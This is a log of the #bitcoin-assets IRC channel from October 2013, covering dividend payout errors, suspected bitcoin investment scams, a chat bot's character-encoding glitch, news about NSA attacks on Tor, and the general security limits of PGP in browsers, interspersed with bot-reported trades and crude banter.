to diff rising Oct 04 22:59:09 though I don't even really understand what it is Oct 04 22:59:18 if we're going to discover theymos was faking his auctions cognitive style... Oct 04 22:59:34 actually TF opened his bid at that Oct 04 22:59:40 lol Oct 04 22:59:48 ;;seen tradefortress Oct 04 22:59:48 tradefortress was last seen in #bitcoin-assets 5 weeks, 1 day, 2 hours, 38 minutes, and 19 seconds ago: Graet, that's technically correct, it's just part of the demo. Oct 04 22:59:48 lol, garr225 right? Oct 04 23:00:01 he dun like irc Oct 04 23:00:02 ThickAsThieves the only way it makes sense to be paying 200 btc to advertise on btctalk ius if you're not paying 200 btc. Oct 04 23:00:07 you can't really fake auctions though. it's mostly psychological Oct 04 23:00:22 like orgasms? Oct 04 23:00:24 lol Oct 04 23:00:39 but srsly, it'd be more cost effective to buy 1 kilo of coke from the fbi Oct 04 23:00:45 and send it in baggies to your prospective customers. Oct 04 23:00:54 [HAVELOCK] [LABCO] [PAID] 0.03950968 BTC to 40`316 shares, 98 satoshi per share Oct 04 23:01:53 maybe it's just his roundabout way of selling PMBs Oct 04 23:02:24 where is all this KNC hardware that was supposed to be out? Oct 04 23:02:47 without the forum, how am I supposed to keep up with scams Oct 04 23:02:56 eh, people seem to be getting it actually Oct 04 23:02:56 Has KNC started hosting hardware yet? Oct 04 23:02:59 ask reddit? Oct 04 23:03:03 ask Knc? Oct 04 23:03:24 from what I have seen, they have not answered on the knc forum in 4 days Oct 04 23:03:51 well they were of course mining with it themselves for a bit before shipping Oct 04 23:03:58 so probably wont affect nethash Oct 04 23:04:11 https://bitfunder.com/asset/ADDICTION#pane_news 9 miners! Oct 04 23:04:17 So much for having the facility setup and ready to go before th chips arrive Oct 04 23:04:58 [BTCTC] [BTC-BOND] 16 @ 0.009989 = 0.1598 BTC [+] Oct 04 23:05:02 from what I understand, they're doing it in the order of all orders, so hosted mining won't go before regular orders Oct 04 23:07:20 http://forum.kncminer.com/forum/main-category/acccounts/4259-i-got-my-tracking-number-%7B%7B-post-here-when-you-do-%7D%7D Oct 04 23:07:22 I got my tracking number {{ POST HERE WHEN YOU DO }} Oct 04 23:14:20 http://cointerra.com/coolit-systems-selected-cointerra-partner-liquid-cooling-solutions/ that's actually more interesting to me than their fpga demo Oct 04 23:16:43 fmlafjlkeajfleawjflkajwekrwkflajfkjfljawkakjfl;lawfl;jwljejvlwg;fjw Oct 04 23:16:58 thestringpuller got a cat Oct 04 23:17:11 or misfapped Oct 04 23:17:53 my cat ran over the keyboard Oct 04 23:18:57 he'd never admit anyway Oct 04 23:19:22 the cat typed "fml" & "flea" Oct 04 23:20:58 So theymos is finally using that donation fund to upgrade the forums? Or just place bounties here and there? Oct 04 23:21:24 thestringpuller: https://soundcloud.com/mslaurynhill/ms-lauryn-hill-consumerism-1 Oct 04 23:21:31 ^ meh Oct 04 23:21:55 at least it has more than 12 unique words Oct 04 23:22:56 https://bitcoinfoundation.org/blog/?p=277 Oct 04 23:23:42 "This is good for the Bitcoin economy in general and the reputation in specific because it proves that Bitcoins are in and of themselves a neutral store of value or medium of exchange and that privacy does not necessarily have to be compromised for law enforcement purposes." Oct 04 23:25:19 [BTCTC] [CIPHERMINE-PT] 3 @ 0.04 = 0.12 BTC [+] Oct 04 23:28:14 Timing buffered disk reads: 5758 MB in 3.00 seconds = 1919.23 MB/sec Oct 04 23:28:20 some things you gotta love. Oct 04 23:30:24 [MPEX] [S.BBET] [PAID] 1.15639577 BTC to 30`000`000 shares, 3 satoshi per share Oct 04 23:30:52 herp. Oct 04 23:31:43 mhm Oct 04 23:35:10 it's actually 2.69 satoshi per share for mpex/coinbr users, 2 satoshi for passthrough bagholders Oct 04 23:37:34 hang on a second. Oct 04 23:37:37 um... my maffs are wrong. Oct 04 23:37:55 it's 3.85 for mpex, 3 else Oct 04 23:38:27 smth is wrong there yeah Oct 04 23:38:35 missed a decimal place? Oct 04 23:39:54 lol looking on my code for wisdom what it actualy did Oct 04 23:40:01 *into Oct 04 23:40:25 uyeah. Oct 04 23:40:34 [BTCTC] [ASICMINER-PT] 17 @ 1.03 = 17.51 BTC [+] Oct 04 23:40:46 seriously mp, into the ground, well, to sea level. :) Oct 04 23:41:02 omg this is hate. Oct 04 23:41:10 lol Oct 04 23:41:35 [MPEX] [S.BBET] [PAID] 1.04075619 BTC to 3`000`000 shares, 34 satoshi per share Oct 04 23:42:01 now it's right. Oct 04 23:42:36 [MPEX] [S.MPOE] [PAID] 21.91991239 BTC to 500`000`000 shares, 4 satoshi per share Oct 04 23:43:22 rejoice. Oct 04 23:44:27 you garbage? Oct 04 23:44:43 hm ? Oct 04 23:44:58 hmm.. why is bbet div less than august if august profits were lower? Oct 04 23:44:58 "i have no idea what's going on." ~towlie. Oct 04 23:45:12 FabianB cause it came in two chunks? Oct 04 23:45:36 at least assbot should have done its maths correctly.. now i have a mess in db Oct 04 23:46:40 [HAVELOCK] [VTX] 3 @ 0.36000007 = 1.08 BTC [+] {2} Oct 04 23:46:44 hm yeah Oct 04 23:46:47 something is off Oct 04 23:46:58 hum Oct 04 23:46:59 yeah wtf. Oct 04 23:47:08 even both together Oct 04 23:47:19 welcome to quantum assets Oct 04 23:47:48 heh. turns out, FabianB, that last month i fucked up the bitbet divs too. Oct 04 23:47:59 i overpaid about 3x ;/ Oct 04 23:48:33 heh Oct 04 23:48:42 july Profit : 5.75330454 BTC / 1.72599069 BTC on 04-08-13 ; aug Profit : 2.69851570 BTC / 2.69851526 BTC Oct 04 23:49:01 basically last month i paid the 3mn shares on mpex as if they were the whole 10mn. which they aren't. Oct 04 23:49:34 lol, why not have all shares on mpex? Oct 04 23:49:44 there will be a 1.88896099 BTC charge on next month to make it whole. unless i forget. Oct 04 23:49:48 or i fuck something else up. Oct 04 23:49:54 scams! Oct 04 23:50:12 FabianB well the bitbet ipo was so that once this 3mn shares sell we get teh rest of our shares allocated. Oct 04 23:50:17 however... so far it's not sold Oct 04 23:50:22 kinda ironic, linking the trillionaire earlier Oct 04 23:50:33 ThickAsThieves i guess this qualifies as an unjustified accelerated dividend and therefore A SCAM Oct 04 23:50:44 [HAVELOCK] [VTX] 10 @ 0.36000007 = 3.6 BTC [+] Oct 04 23:51:23 mircea_popescu first payment was for 30 mio shares, second for 3 mio Oct 04 23:51:52 kakobrekla this month ? yes. Oct 04 23:51:52 coincidentally was discussing various risks in operation with lawyer today, including "human error" Oct 04 23:52:10 ThickAsThieves im notoriously bad at this dividend crap. just ask jurov. Oct 04 23:52:27 yeah that why assbot reported wrong numbers Oct 04 23:52:44 is not phps fault Oct 04 23:52:54 kill all teh dividend assets! Oct 04 23:53:42 assbot is not to blame Oct 04 23:53:47 [HAVELOCK] [VTX] 1 @ 0.36 BTC [-] Oct 04 23:54:07 for this i must have all kinds of paranoid checks in my code...actually i contemplated checking that fractional part isn't >1 satoshi Oct 04 23:54:13 that would have saved me Oct 04 23:54:23 but i said to myself, meh just once a month Oct 04 23:54:32 http://www.ktvu.com/news/news/crime-law/san-francisco-man-denies-connection-silk-road-webs/nbF8F/ Oct 04 23:54:33 San Francisco man denies connection to 'Silk Road' website | www.ktvu.com Oct 04 23:54:48 fractional part > 1 ? Oct 04 23:55:00 he looks kinda like that Twilight vampire brit Oct 04 23:55:26 as i wrote above, mpex doesn't round divs to whole satoshi/share Oct 04 23:55:35 http://trilema.com/2013/bitbet-september-2013-statement/ < made an update. Oct 04 23:55:35 BitBet, September 2013 Statement pe Trilema - Un blog de Mircea Popescu. Oct 04 23:56:46 how did that happen Oct 04 23:58:21 that ? Oct 04 23:58:45 mircea_popescu: i think the log.bitcoin-assets links only work today if you link it without a date parameter Oct 04 23:59:11 no way ?! Oct 04 23:59:14 oh i love the new trilema header photo Oct 04 23:59:29 i see it just fine ? it underscores you in yellow Oct 04 23:59:45 mircea_popescu: yes, today, but not if you click it tomorrow Oct 04 23:59:46 FabianB has a point Oct 05 00:00:06 well this would be because phprekla can't phode. Oct 05 00:00:24 kakobrekla: maybe you could include the date in the links on the left Oct 05 00:00:49 yeah srsly. i need my references. Oct 05 00:00:51 jsrekla will jsfix it Oct 05 00:01:03 make all the things clickable! Oct 05 00:01:14 must have all the links permanent! Oct 05 00:01:17 and with RSS feeds Oct 05 00:01:25 we need a better logo. Oct 05 00:01:33 make RSS feed for every handle, etc Oct 05 00:01:39 FabianB : i think now it'll work Oct 05 00:01:59 ya totally needs a logo. Oct 05 00:02:03 actually this chan needs a mascot Oct 05 00:02:10 mircea_popescu: yup, looks good Oct 05 00:02:12 ever since usagi took that surgery. Oct 05 00:02:29 ThickAsThieves the horse loves you back. Oct 05 00:02:30 Assbot the Mascot? Oct 05 00:02:49 robotic donkey? Oct 05 00:03:12 a robotic wooden log? Oct 05 00:03:46 ThickAsThieves: Sorry to bother you but have you finished moving to bitfunder? Oct 05 00:03:50 Neobee Oct 05 00:04:06 I am not the real Thickasthieves Oct 05 00:04:23 he doesnt hang out in IRC Oct 05 00:04:53 nor does he run an illegal drug market Oct 05 00:05:38 read: it was the six finger man! Oct 05 00:05:48 kayzer sez me ?! Oct 05 00:06:03 in all seriousnesss, skinnkavaj, no is the answer Oct 05 00:06:07 http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity Oct 05 00:06:08 Attacking Tor: how the NSA targets users' online anonymity | World news | theguardian.com Oct 05 00:06:21 this is the most retarded write-up of security i saw this year. Oct 05 00:06:41 half way into it the poor undergrad camwho doing the write-up is just... mentally exhausted. Oct 05 00:06:44 ThickAsThieves: Now im really confused.. Oct 05 00:07:00 [BTCTC] [LABCOIN] 1343 @ 0.000226 = 0.3035 BTC [-] Oct 05 00:07:08 wait, it was written by bruce schneider. what the ef. Oct 05 00:07:33 skinnkavaj: I always read your nickname as skinnyvaj' Oct 05 00:07:48 pankkake: Is that someone i should know? Oct 05 00:09:02 [HAVELOCK] [VTX] 3 @ 0.35999999 = 1.08 BTC [-] {2} Oct 05 00:09:13 lol cute. Oct 05 00:09:22 skinnkavaj vaj would be vagina in that context. Oct 05 00:09:37 A well screw you then im going home Oct 05 00:09:43 lmao Oct 05 00:10:54 I often misread new words (like kakobrekla, I read it as something else for weeks) Oct 05 00:11:05 I don't remember which, but there's one I was misreading for years Oct 05 00:11:11 FabianB / mircea_popescu ; should be fixed Oct 05 00:11:39 yeah dont worry its not really a word Oct 05 00:12:29 it's a scam. Oct 05 00:13:06 [BTCTC] [PETA-MINE] 3 @ 0.5 = 1.5 BTC [-] Oct 05 00:13:51 mircea_popescu: you might want to grep (if your blog allows that) for more old log.bitcoin-assets links Oct 05 00:14:06 yes good idea. Oct 05 00:14:42 i think i saw at least one more, don't remember which article though Oct 05 00:16:45 there's exactly 3 Oct 05 00:17:06 "Recently published news articles discuss the intelligence community's interest in tools used to facilitate anonymous online communication. The articles accurately point out that the intelligence community seeks to understand how these tools work and the kind of information being concealed. Oct 05 00:17:06 However, the articles fail to make clear that the intelligence community's interest in online anonymity services and other online communication and networking tools is based on the undeniable fact that these are the tools our adversaries use to communicate and coordinate attacks against the United States and our allies." Oct 05 00:17:38 http://log.bitcoin-assets.com/#313531 hm Oct 05 00:17:41 #bitcoin-assets log Oct 05 00:17:57 kakobrekla can you grep the log for to halp me get these dates ? Oct 05 00:18:11 [HAVELOCK] [VTX] 8 @ 0.36 = 2.88 BTC [+] Oct 05 00:18:33 http://log.bitcoin-assets.com/#332651 http://log.bitcoin-assets.com/#318803 Oct 05 00:18:36 #bitcoin-assets log Oct 05 00:19:32 http://log.bitcoin-assets.com/?date=17-09-2013#318803 Oct 05 00:19:34 #bitcoin-assets log Oct 05 00:20:13 [HAVELOCK] [VTX] 1 @ 0.36 BTC [+] Oct 05 00:20:50 moar? Oct 05 00:21:36 just those 3 Oct 05 00:21:54 a Oct 05 00:21:56 theres 3 Oct 05 00:22:00 didnt see Oct 05 00:22:58 http://log.bitcoin-assets.com/?date=27-09-2013#332651 Oct 05 00:23:00 #bitcoin-assets log Oct 05 00:23:38 okay, coinbr is fixed Oct 05 00:23:55 http://log.bitcoin-assets.com/?date=14-09-2013#313531 Oct 05 00:23:58 #bitcoin-assets log Oct 05 00:24:17 [BTCTC] [ASICMINER-PT] 4 @ 1.04 = 4.16 BTC [+] Oct 05 00:24:18 tyvm Oct 05 00:25:10 https://picostocks.com/stocks/view/31 + https://picostocks.com/businessplan/31 X_X ... it's scam, right? Oct 05 00:25:21 so today FabianB has found my missing 2btc and has fixed my blog. Oct 05 00:25:24 PicoStocks.com Oct 05 00:25:35 hehe Oct 05 00:25:35 dexX7 you're like the third guy today. Oct 05 00:26:19 meh Oct 05 00:27:23 does fabian get a cherry truck or such now? Oct 05 00:27:24 http://i.imgur.com/ZMf6Lvt.png ... k it is fake Oct 05 00:27:40 so how many btcs did they steal? Oct 05 00:28:23 kinda amazing theyd so blatantly show they are a scam Oct 05 00:28:24 AMAZING COMPANY! Oct 05 00:28:29 :) Oct 05 00:29:19 ThickAsThieves: i guess i get working links when i read articles on dates after they were written :) Oct 05 00:30:40 i think the cherry truck is for doing god's work by arguing with some retard on btctalk over 50 pages Oct 05 00:33:03 http://log.bitcoin-assets.com/?date=24-09-2013#329164 Oct 05 00:33:06 #bitcoin-assets log Oct 05 00:33:08 that shit's ironic. Oct 05 00:33:10 wtf happened there Oct 05 00:33:21 lmao Oct 05 00:33:28 no clue Oct 05 00:33:32 you got censored, i spotted it quickly Oct 05 00:33:39 you then put it into blog Oct 05 00:34:00 this is conspiraci Oct 05 00:34:00 log.b-a censors? Oct 05 00:34:01 some strange encoding? i know it works for arabis chars Oct 05 00:34:11 nah it was english Oct 05 00:34:16 oh right it breaks on some encodings from what i've seen Oct 05 00:34:19 hm Oct 05 00:34:19 apparently long strings kill the bot ? Oct 05 00:34:28 yes, it was that Oct 05 00:34:34 it was what Oct 05 00:34:44 well proper English punctuation can be unicode characters too Oct 05 00:34:48 several ~400 chars long lines Oct 05 00:34:48 i dont think lenght is the problem Oct 05 00:34:48 there were > 500 characters per line in that quote Oct 05 00:34:56 irc has limit to it Oct 05 00:35:03 set by the network Oct 05 00:35:04 let mwe find it in my log Oct 05 00:35:22 i have seen them here...but assbot did not Oct 05 00:35:35 The Agreement provides that in the event of termination, no party shall be liable beyond the specific liabilities imposed in the Agreement (i.e., the termination fee), except “that no such termination shall relieve any party … from any liability or damages resulting from the wilful and material breach … by a party of any of its representations, warranties, covenants or agreements set forth in this Agreement.” ( Oct 05 00:35:59 The Agreement provides that in the event of termination, no party shall be liable beyond the specific liabilities imposed in the Agreement (i.e., the termination fee), except that no such termination shall relieve any party … from any liability or damages resulting from the wilful and material breach … by a party of any of its representations, warranties, covenants or agreements set forth in this Agreement. ( Oct 05 00:36:09 holes! Oct 05 00:36:15 this is SCAM logging. Oct 05 00:36:24 “ redacted Oct 05 00:36:29 http://i.imgur.com/VmQB7yn.png weird characters Oct 05 00:36:30 lol Oct 05 00:36:44 in my text too? Oct 05 00:36:48 so Cointerra is 3 miles from me, huh Oct 05 00:36:48 yes Oct 05 00:36:57 jborkl going by ? Oct 05 00:37:08 … ? Oct 05 00:37:15 I know exaclty the building they say they are in Oct 05 00:37:17 The Agreement provides that in the event of termination, no party shall be liable beyond the specific liabilities imposed in the Agreement (i.e., the termination fee), except that no such termination shall relieve any party … from any liability or damages resulting from the wilful and material breach … by a party of any of its representations, warranties, covenants or agreements set forth in this Agreement. ( Oct 05 00:37:25 hm Oct 05 00:37:27 charles schwab office in that building Oct 05 00:37:35 I will go by and see Oct 05 00:37:41 kakobrekla it's the triple dot continuation marks Oct 05 00:37:52 ah Oct 05 00:38:00 well dont say that anymore! Oct 05 00:38:00 jborkl going by ? look at line right after that Oct 05 00:38:03 it came out empty Oct 05 00:38:09 hehe mk. Oct 05 00:38:18 those? … Oct 05 00:38:24 http://blog.jim.com/economics/technological-failure-of-the-silk-road-system.html (or: a few words from Cpt. Obvious) Oct 05 00:38:25 Technological failure of the silk road system « Jim’s Blog Oct 05 00:38:39 … kakobrekla is a clit sausage. Oct 05 00:38:55 i guess now we have an off the record symbol. Oct 05 00:39:03 which is not necessarily that bad. Oct 05 00:39:08 lolz Oct 05 00:39:22 asciilifeform: or simply, make your website use openpgpjs. don't get why no one does Oct 05 00:39:45 pankkake: js-anything as a security component damns your soul. Oct 05 00:39:47 is that actually a proper implementation ? Oct 05 00:39:50 ^ Oct 05 00:39:55 it seems to be Oct 05 00:40:00 the site (or mitm version) can always serve up a diddled js. Oct 05 00:40:03 hmm, that is a apt complex, not a office Oct 05 00:40:04 Æώ Oct 05 00:40:10 hm, true Oct 05 00:40:16 ? hm Oct 05 00:40:28 but at least they woulndn't get any message before compromission Oct 05 00:40:28 asciilifeform who the hell is "jim" Oct 05 00:40:39 nobody. Oct 05 00:40:47 just a random find. Oct 05 00:42:21 i cant reproduce that triple dot in this retarded client Oct 05 00:42:27 just have a tor bundle include gpg proper Oct 05 00:42:27 but, i can just take out of db Oct 05 00:42:29 so fuck dat. Oct 05 00:42:31 http://blog.jim.com/wp-comments-post.php > Error 404 - Not Found Oct 05 00:42:53 dont u version me pankkake Oct 05 00:43:03 Fuck u doing pankkake Oct 05 00:43:24 scriptkiddie Oct 05 00:43:27 :D Oct 05 00:43:51 the phone number cointerra has does not work Oct 05 00:43:51 lol at your version Oct 05 00:43:59 jborkl: SCAM!!! Oct 05 00:44:06 https://lists.torproject.org/pipermail/tor-talk/2011-October/021770.html Oct 05 00:44:06 [tor-talk] Tor Browser Bundle: PGP encryption built-in? Oct 05 00:44:13 whose, mine? Oct 05 00:44:23 kakobrekla U+2026 ? Oct 05 00:44:26 i use heavily modified script kiddie script Oct 05 00:44:30 also broken Oct 05 00:44:48 no i has some strange encoding here Oct 05 00:45:00 well it's horizontal ellipsis. anyway. Oct 05 00:45:03 lol " Oct 05 00:45:04 I don't consider Firefox the 'best of Web Browsing' or GPG the 'best Oct 05 00:45:06 of encryption'. They are only the crap tools we're stuck with for Oct 05 00:45:07 now. Oct 05 00:45:09 " Oct 05 00:45:22 my irc client is legacy Oct 05 00:45:24 well it's good to see the interwebs have not run out of retards. Oct 05 00:45:25 hence ended the inquiry to add gpg to tor bundle. Oct 05 00:46:15 a basic and inescapable problem in something like 'pgp in browser' is that the user has no way to tell if he's actually using what he thinks he's using. Oct 05 00:46:23 http://bash.bitcoin-assets.com/?page=1&order=dateup < ok this shit's pretty lol Oct 05 00:46:24 #bitcoin-assets bash Oct 05 00:46:35 yeah, you'd need a browser extension… Oct 05 00:46:40 I've tried webpg, and it sucks Oct 05 00:46:45 asciilifeform this is true. Oct 05 00:46:52 yes but they were talking about some browser add-on Oct 05 00:46:55 does not handle multiple identities, and slows down the browser after a few hours Oct 05 00:46:56 ideally what you need is an airgapped machine and a pistol reader. Oct 05 00:46:58 and this is completely aside from the 'toilet in the kitchen' problems you get. Oct 05 00:47:46 just talked to a cointerra guy, he wont let me come by Oct 05 00:47:54 why niot ? Oct 05 00:48:11 he said they dont have anything to show me right now Oct 05 00:48:27 ... Oct 05 00:48:27 scams Oct 05 00:48:55 well... pick up two highschool chicks and a liter bottle of vodka and go crash their office. Oct 05 00:49:16 weel, I figured out it was a apt complex Oct 05 00:49:27 speaking of which, bbl. Oct 05 00:49:45 he is going to trash the office Oct 05 00:56:51 [MPEX] [S.MPOE] 2200 @ 0.00087512 = 1.9253 BTC [+] {2} Oct 05 01:14:07 [HAVELOCK] [AM1] 1 @ 1.00000001 BTC [-] Oct 05 01:19:12 [BTCTC] [FN] [DMS.PURCHASE] 21 @ 0.006763 = 0.142 BTC [+] Oct 05 01:22:15 [HAVELOCK] [AM100] 120 @ 0.00901347 = 1.0816 BTC [-] {5} Oct 05 01:27:20 [HAVELOCK] [AM100] 41 @ 0.00900102 = 0.369 BTC [-] Oct 05 01:28:51 kakobrekla: assbot should do *tumbleweed* when no activity Oct 05 01:29:51 since her source code needs to be maintained in constant state of disorder Oct 05 01:30:11 !t m s.mpoe Oct 05 01:30:13 [MPEX:S.MPOE] 1D: 0.00086486 / 0.00090941 / 0.00093695 (101603 shares, 92.40 BTC), 7D: 0.0007725 / 0.00086624 / 0.00094023 (478116 shares, 414.17 BTC), 30D: 0.0007725 / 0.00089768 / 0.00094307 (6407070 shares, 5,751.55 BTC) Oct 05 01:30:31 !t m s.nsa Oct 05 01:30:32 Are you sure you have no tobacco? Oct 05 01:30:38 gotcha :) Oct 05 01:31:14 that reminds me to add it to coinbr Oct 05 01:31:24 [HAVELOCK] [AM100] 81 @ 0.00900102 = 0.7291 BTC [-] Oct 05 01:31:25 [HAVELOCK] [VTX] 1 @ 0.34 BTC [-] Oct 05 01:31:52 you have to add the new securities manually? Oct 05 01:32:11 yes. there's no reliable way otherwise Oct 05 01:32:31 i even had S.DICE shown in stat output till today Oct 05 01:37:30 [MPEX] [S.MPOE] 425 @ 0.00087645 = 0.3725 BTC [+] Oct 05 01:39:32 [HAVELOCK] [AM100] 211 @ 0.00900102 = 1.8992 BTC [-] Oct 05 01:47:39 [BTCTC] [ASICMINER-PT] 1 @ 1.04 BTC [+] Oct 05 01:51:44 [HAVELOCK] [AM100] 14 @ 0.00900102 = 0.126 BTC [-] Oct 05 01:54:51 http://www.euronews.com/2013/10/04/students-strip-naked-to-protest-over-strict-new-dress-code-at-kaposvar-universit/ Oct 05 01:54:51 Students strip in protest over dress code at Kaposvar University in Hungary | euronews, Oct 05 02:15:07 [BTCTC] [ASICMINER-PT] 1 @ 1.04 BTC [+] **** BEGIN LOGGING AT Sat Oct 5 08:28:13 2013 Oct 05 08:44:24 [MPEX] [S.MPOE] 5425 @ 0.00087694 = 4.7574 BTC [+] Oct 05 08:52:32 [BTCTC] [BASIC-MINING] 6 @ 0.045 = 0.27 BTC [+] Oct 05 09:22:01 [BTCTC] [ASICMINER-PT] 15 @ 1.075 = 16.125 BTC [+] Oct 05 09:24:03 [BTCTC] [ASICMINER-PT] 16 @ 1.099 = 17.584 BTC [+] Oct 05 09:33:13 http://ij.org/miforf Oct 05 09:33:14 The Institute for Justice Oct 05 09:33:18 "Can the government use civil forfeiture to take your money when you have done nothing wrong—and then pocket the proceeds? The IRS thinks so." Oct 05 09:34:13 [BTCTC] [CRYPTO-TRADE] 29 @ 0.13990689 = 4.0573 BTC [-] {5} Oct 05 09:38:57 this institude for justice seems to do pretty cool stuff Oct 05 09:41:14 ;;bc,stats Oct 05 09:41:17 Current Blocks: 261801 | Current Difficulty: 1.4881919980509263E8 | Next Difficulty At Block: 262079 | Next Difficulty In: 278 blocks | Next Difficulty In About: 1 day, 14 hours, 7 minutes, and 32 seconds | Next Difficulty Estimate: 185413506.454 | Estimated Percent Change: 24.58978 Oct 05 09:42:47 shouldnt you be sleeping Oct 05 09:43:19 are you the nsa or what? :) Oct 05 09:44:03 hehe Oct 05 09:45:09 well, headaches :/ Oct 05 09:45:29 oh? Oct 05 09:45:35 no remedies for that? Oct 05 09:46:01 many doctors seen, and for now, nothing concrete Oct 05 09:46:11 hence my time spent insulting people on forums Oct 05 09:46:17 instead of being productive Oct 05 09:46:29 i do that too, but without the headache Oct 05 09:46:39 :) Oct 05 09:47:24 im cycling again Oct 05 09:47:34 each day im up a bit longer Oct 05 09:48:10 not that id want to. Oct 05 09:48:36 oh, I did try the 28 hour day for a while Oct 05 09:48:42 it was good the first weeks Oct 05 09:48:45 i blame the lack of buttsecks Oct 05 09:49:20 but even my minimal social life was affected Oct 05 09:49:30 always blame the lack of buttsex Oct 05 09:49:39 social life? Oct 05 09:49:47 ;;google define:social life Oct 05 09:49:48 Social Life Magazine: ; Social Life | Psychology Today: ; Social life - Wikipedia, the free encyclopedia: Oct 05 09:49:56 :) Oct 05 09:50:12 I mean you have to think if you're going to be sleeping at some hour Oct 05 09:50:20 it's not like ok I can be there that day Oct 05 09:50:49 it's also very weird when you get out and the sun isn't where it should be Oct 05 09:50:58 lucky for me i hate people enough so i dont miss the socialization Oct 05 09:51:11 oh im used to that Oct 05 09:51:17 getting up at sundown Oct 05 09:51:36 well, I thought I was - but I gave up after a month I think Oct 05 09:51:53 i have been doing this for years Oct 05 09:52:08 dunno what the long term effect is Oct 05 09:52:10 lol Oct 05 09:52:12 death if nothing else Oct 05 09:52:25 whats funny there Oct 05 09:52:32 I think doing it like 26h week (and cycle over 2 weeks) would be idle Oct 05 09:52:38 26h day* Oct 05 09:52:41 pankkake have you tried the old ice water remedy ? Oct 05 09:52:45 ideal* Oct 05 09:52:59 meh i cant plan my sleep Oct 05 09:53:25 28h was a bit tiring a times Oct 05 09:53:28 except the lack of it Oct 05 09:53:32 I wanted to go to sleep but forced me no to Oct 05 09:53:55 i have done 72hrs couple of times Oct 05 09:54:16 when I was younger, I did too Oct 05 09:54:22 it gets fun after 48 or so Oct 05 09:54:30 usually masturbating Oct 05 09:54:33 i really mean fun Oct 05 09:54:41 everything gets hilarious Oct 05 09:54:55 yeah i get "drunk" Oct 05 09:55:04 almost Oct 05 09:55:55 http://trilema.com/2013/why-you-need-bitcoin-simply-put/ Oct 05 09:55:56 Why you need Bitcoin, simply put. pe Trilema - Un blog de Mircea Popescu. Oct 05 09:56:28 where are the tits Oct 05 09:56:38 there shall be no further tits Oct 05 09:57:06 whats this, concentration camp? Oct 05 09:57:08 i used to buy them on the silk road. now that the feds have disrupted silkroad, my supply of tits is gone. Oct 05 09:58:22 let's create titcoin. has 42 million titcoins, and you can only spend them by two Oct 05 09:58:58 must press tits against screen to sign tx Oct 05 09:59:19 make that a titocoin and maybe someone will go for it Oct 05 09:59:28 hm, you can probably have a tit fingerprint and convert it to a private key Oct 05 09:59:46 but that goes for anything Oct 05 10:00:30 if diablo were here hed say "peniscoin!" Oct 05 10:02:03 I still have the best altcoin idea ever, the bernankoin Oct 05 10:02:12 rename mining to printing Oct 05 10:02:27 and block reward = difficulty Oct 05 10:02:41 no must be PoS Oct 05 10:02:50 instead of pow Oct 05 10:03:03 and print yourself a billion Oct 05 10:03:42 [MPEX] [S.MPOE] 7300 @ 0.0008771 = 6.4028 BTC [+] {2} Oct 05 10:04:44 I'm already too lazy to actually create it, so understanding the PoS dynamics… probably not :p Oct 05 10:05:05 what you dont need to do anything Oct 05 10:05:25 just follow the 'make your own bitcoin fork' manual Oct 05 10:05:31 and make a logo Oct 05 10:05:36 done Oct 05 10:05:57 yeah, I think I bookmarked it for the occasion Oct 05 10:06:41 there's also some Krugman pics I could use Oct 05 10:06:57 http://dealbreaker.com/uploads/2011/04/Paul-Krugman-with-Cat.jpg Oct 05 10:09:59 http://www.theguardian.com/world/interactive/2013/oct/04/egotistical-giraffe-nsa-tor-document Oct 05 10:10:27 egotistical giraffe, egostistical goat Oct 05 10:14:46 http://www.theguardian.com/world/2013/oct/04/tor-attacks-nsa-users-online-anonymity << i recommend this one, very rich of information Oct 05 10:14:46 Attacking Tor: how the NSA targets users' online anonymity | World news | theguardian.com Oct 05 10:30:27 dexX7 it's really very badly written, nonsensical goop. Oct 05 10:30:55 i can't imagine schneider actually penned that. he must have sent sometyhing that got "edited for clarity" Oct 05 10:32:11 [BTCTC] [PETA-MINE] 7 @ 0.5 = 3.5 BTC [-] Oct 05 10:33:54 are you saying "the content is inconsistent" or "the presentation is just bad"? Oct 05 10:35:26 i am saying that numerous concepts are employed in a way which belies unfamiliarity with the field, and the general structuring of the narrative is such that you suspect the author does not have a birds eye view of the topic. Oct 05 10:35:51 neither of those goes with the alleged author, unless he was very very drunk at the time. Oct 05 10:36:07 but anyway, i guess now i have to go into details as otherwise this is all useless nonsense. brb. **** BEGIN LOGGING AT Sat Oct 5 11:36:21 2013 Oct 05 11:49:02 ;;later tell dexx7 http://trilema.com/2013/dear-guardian-stop-being-retarded/ Oct 05 11:49:04 The operation succeeded. Oct 05 12:05:37 is adobe a scam? Oct 05 12:12:09 it's just evil. Oct 05 12:33:09 [MPEX] [S.MPOE] 3750 @ 0.00087248 = 3.2718 BTC [-] Oct 05 12:42:07 http://www.google.de/trends/explore?q=bitcoin#q=bitcoin%2C%20Silk%20Road&date=today%201-m&cmpt=q Oct 05 12:42:08 Google Trends Oct 05 12:42:18 oh yes! :) Oct 05 12:51:26 [BTCTC] [ASICMINER-PT] 2 @ 1.021 = 2.042 BTC [-] Oct 05 13:05:42 [BTCTC] [LABCOIN] 522 @ 0.0002135 = 0.1114 BTC [-] Oct 05 13:23:59 [BTCTC] [LABCOIN] 2415 @ 0.00024997 = 0.6037 BTC [+] {2} Oct 05 13:29:04 [BTCTC] [ASICMINER-PT] 2 @ 1.021 = 2.042 BTC [-] Oct 05 13:29:04 [BTCTC] [BASIC-MINING] 3 @ 0.0499 = 0.1497 BTC [+] Oct 05 13:47:31 .d Oct 05 13:47:31 148819199.80509 | Next Diff in 231 blocks | Estimated Change: 25.6612% in 1d 4h 35m 46s Oct 05 14:01:25 "Alexander further detailed that the metadata is collected under Executive Order 12333 from 2009." Oct 05 14:01:33 fuckwit. 12333 was signed in like the 80s Oct 05 14:01:40 we're in the mid 13k's by now. Oct 05 14:07:02 ya 12333 would have been during reagan Oct 05 14:07:56 http://en.wikipedia.org/wiki/Executive_Order_12333 Oct 05 14:10:33 something like that yeah Oct 05 15:00:33 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 05 15:11:41 "Join the investment class today and start the wealth creation process!" Oct 05 15:12:31 "Find out how Thousands of Redditors Earn Interest every 6 hours by simply depositing Bitcoins. What? We are serious." Oct 05 15:12:43 "mcxNOW is the worlds fastest digital exchange coded securely in low level C++. Unlike other exchanges it offers interest on all deposits and allows you to earn a percentage of all fees the exchange generates!" Oct 05 15:12:46 sigh Oct 05 15:12:51 https://mcxnow.com/ Oct 05 15:12:52 mcxNOW - Digital Currency Exchange and Payment System Oct 05 15:28:16 lol Oct 05 15:28:37 so basically the forum has moved to reddit 